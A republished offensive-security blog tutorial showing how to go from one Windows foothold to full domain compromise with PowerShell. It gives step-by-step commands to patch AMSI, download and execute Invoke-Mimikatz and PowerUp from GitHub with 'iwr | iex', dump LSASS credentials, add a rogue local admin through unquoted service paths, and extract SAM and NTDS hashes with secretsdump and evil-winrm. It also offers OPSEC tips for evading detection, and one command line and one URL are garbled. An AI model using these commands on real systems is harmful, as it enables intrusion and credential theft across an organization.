National Cyber Warfare Foundation (NCWF)

PowerShell for Hackers: Privilege Escalation and Organization Takeover


0 user ratings
2025-10-08 14:59:06
milo
Red Team (CNA)

Use AMSI bypasses, Mimikatz, and PowerUp to escalate from a single foothold into full domain compromise


The post PowerShell for Hackers: Privilege Escalation and Organization Takeover first appeared on Hackers Arise.



Welcome back hackers!





For quite an extensive period of time we have been covering different ways PowerShell can be used by hackers. We learned the basics of reconnaissance, persistence methods, survival techniques, evasion tricks, and mayhem methods. Today we are continuing our study of PowerShell and learning how we can automate it for real hacking tasks such as privilege escalation, AMSI bypass, and dumping credentials. As you can see, PowerShell may be used to exploit systems, although it was never created for this purpose. Our goal is to make it simple for you to automate exploitation during pentests. Things that are usually done manually can be automated with the help of the scripts we are going to cover. Let’s start by learning about AMSI.





AMSI Bypass





Repo:





https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell





AMSI is the Antimalware Scan Interface. It is a Windows feature that sits between script engines like PowerShell or Office macros and whatever antivirus or EDR product is installed on the machine. When a script or a payload is executed, the runtime hands that content to AMSI so the security product can scan it before anything dangerous runs. It makes scripts and memory activity visible to security tools, which raises the bar for simple script-based attacks and malware. Hackers constantly try to find ways to keep malicious content from ever being presented to it, or to change the content so it won’t match detection rules. You will see many articles and tools that claim to bypass AMSI, but soon after they are released, Microsoft patches the vulnerabilities. Since it’s important to be familiar with this attack, let’s test our system and try to patch AMSI.





First we need to check if the Defender is running on a Russian target:





PS > Get-WmiObject -Class Win32_Service -Filter “Name=’WinDefend’”





checking if the defender is running on windows




And it is. If it was off, we would not need any AMSI bypass and could jump straight to our explorations.





Patching AMSI





Next, we start patching AMSI with the help of our script, which you can find at the following link:





https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/shantanukhande-amsi.ps1





As you know by now, there are a few ways to execute scripts in PowerShell. We will use a basic one for demonstration purposes:





PS > .\shantanukhande-amsi.ps1





patching amsi with a powershell script




If your output matches ours, then AMSI has been successfully patched. From now on, the Defender does not have access to your PowerShell sessions and any kind of scripts can be executed in it without restriction. It’s important to mention that some articles on AMSI bypass will tell you that downgrading to PowerShell Version 2 helps to evade detection, but that is not true. At least not anymore. Defender actively monitors all of your sessions and these simple tricks will not work.





Dumping Credentials with Mimikatz





Repo:





http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1





Since you are free to run anything you want, we can execute Mimikatz right in our session. Note that we are using Invoke-Mimikatz.ps1 by g4uss47, and it is the updated PowerShell version of Mimikatz that actually works. For OPSEC reasons we do not recommend running Mimikatz commands that touch other hosts because network security products might pick this up. Instead, let’s dump LSASS locally and inspect the results:





PS > iwr http://raw.githubusercontent.com/g4uss47/Invoke-Mimikatz/refs/heads/master/Invoke-Mimikatz.ps1 | iex  





PS > Invoke-Mimikatz -DumpCreds





dumping lsass with mimikatz powershell script Invoke-Mimikatz.ps1




Now we have the credentials of brandmanager. If we compromised a more valuable target in the domain, like a server or a database, we could expect domain admin credentials. You will see this quite often.





Privilege Escalation with PowerUp





Privilege escalation is a complex topic. Frequently systems will be misconfigured and people will feel comfortable without realizing that security risks exist. This may allow you to skip privilege escalation altogether and jump straight to lateral movement, since the compromised user already has high privileges. There are multiple vectors of privilege escalation, but among the most common ones are unquoted service paths and insecure file permissions. While insecure file permissions can be easily abused by replacing the legitimate file with a malicious one of the same name, unquoted service paths may require more work for a beginner. That’s why we will cover this attack today with the help of PowerUp. Before we proceed, it’s important to mention that this script has been known to security products for a long time, so be careful.





Finding Vulnerable Services





Unquoted Service Path is a configuration mistake in Windows services where the full path to the service executable contains spaces but is not wrapped in quotation marks. Because Windows treats spaces as separators when resolving file paths, an unquoted path like C:\Program Files\My Service\service.exe can be interpreted ambiguously. The system may search for an executable at earlier, shorter segments of that path (for example C:\Program.exe or C:\Program Files\My.exe) before reaching the intended service.exe. A hacker can place their own executable at one of those earlier locations, and the system will run that program instead of the real service binary. This works as a privilege escalation method because services typically run with higher privileges.





Let’s run PowerUp and find vulnerable services:





PS > iwr https://raw.githubcontent.com/PowerShellMafia/PowerSploit/refs/heads/master/Privesc/PowerUp.ps1 | iex  





PS > Get-UnquotedService





listing vulnerable unquoted services to privilege escalation




Now let’s test the service names and see which one will get us local admin privileges:





PS > Invoke-ServiceAbuse -Name 'Service Name'





If successful, you should see the name of the service abused and the command it executed. By default, the script will create and add user john to the local admin group. You can edit it to fit your needs.





The results can be tested:





PS > net user john





abusing an unqouted service with the help of PowerUp.ps1




Now we have an admin user on this machine, which can be used for various purposes.





Attacking NTDS and SAM





Repo:





https://github.com/soupbone89/Scripts/tree/main/NTDS-SAM%20Dumper





With enough privileges we can dump NTDS and SAM without having to deal with security products at all, just with the help of native Windows functions. Usually these attacks require multiple commands, as dumping only NTDS or only a SAM hive does not help. For this reason, we have added a new script to our repository. It will automatically identify the type of host you are running it on and dump the needed files. NTDS only exists on Domain Controllers and contains the credentials of all Active Directory users. This file cannot be found on regular machines. Regular machines will instead be exploited by dumping their SAM and SYSTEM hives. The script is not flagged by any AV product. Below you can see how it works.





Attacking SAM on Domain Machines





To avoid issues, bypass the execution policy:





PS > powershell -ep bypass





Then dump SAM and SYSTEM hives:





PS > .
tds.ps1





dumping sam and system hives with ntds.ps1




listing sam and system hive dumps




Wait a few seconds and find your files in C:\Temp. If the directory does not exist, it will be created by the script.





Next we need to exfiltrate these files and extract the credentials:





bash$ > secretsdump.py -sam SAM -system SYSTEM LOCAL





extracting creds from sam hive




Attacking NTDS on Domain Controllers





If you have already compromised a domain admin, or managed to escalate your privileges on the Domain Controller, you might want to get the credentials of all users in the company.





We often use Evil-WinRM to avoid unnecessary GUI interactions that are easy to spot. Evil-WinRM allows you to load all your scripts from the machine so they will be executed without touching the disk. It can also patch AMSI, but be really careful.





Connect to the DC:





c2 > evil-winrm -i DC -u admin -p password -s ‘/home/user/scripts/’





Now you can execute your scripts:





PS > ntds.ps1





dumping NTDS with ntds.ps1 script




Evil-WinRM has a download command that can help you extract the files. After that, run this command:





bash$ > secretsdump.py -ntds ntds.dit -sam SAM -system SYSTEM LOCAL





extracting creds from the ntds dump




Summary





In this chapter, we explored how PowerShell can be used for privilege escalation and complete domain compromise. We began with bypassing AMSI to clear the way for running offensive scripts without interference, then moved on to credential dumping with Mimikatz. From there, we looked at privilege escalation techniques such as unquoted service paths with PowerUp, followed by dumping NTDS and SAM databases once higher privileges were achieved. Each step builds on the previous one, showing how hackers chain small misconfigurations into full organizational takeover. Defenders should also be familiar with these attacks as it will help them tune the security products. For instance, harmless actions such as creating a shadow copy to dump NTDS and SAM can be spotted if you monitor Event ID 8193 and Event ID 12298. Many activities can be monitored, even benign ones. It depends on where defenders are looking at.

The post PowerShell for Hackers: Privilege Escalation and Organization Takeover first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/powershell-for-hackers-privilege-escalation-and-organization-takeover/


Comments
new comment
Nobody has commented yet. Will you be the first?
 
Forum
Red Team (CNA)



Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.